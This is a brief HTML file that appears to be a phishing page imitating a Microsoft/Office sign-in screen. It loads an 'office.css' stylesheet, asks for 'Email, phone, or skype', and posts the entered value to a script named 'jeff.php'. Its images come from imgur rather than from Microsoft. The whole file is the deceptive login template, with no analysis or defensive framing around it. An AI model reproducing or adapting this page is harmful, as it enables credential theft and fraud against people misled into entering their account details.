
<!doctype html>
<html>
<head>
<title>Sign In</title>
<body>
  <link href="office.css" rel="stylesheet">
<center>
<form action="jeff.php" method="post"><br><br><br>
<br><br><br><fieldset><br>
<img src="https://i.imgur.com/nzqsLYY.png"><br>
<input type="text" name="user" placeholder="Email, phone, or skype" required >
<br><img src="https://i.imgur.com/Zju9ooP.png">
    <br>
    <input type="submit" name="submit" value="Next"/> <br> <br><br></fieldset>

</center>
</form>

<div class=top> <img src=""></div>
</body>
</html>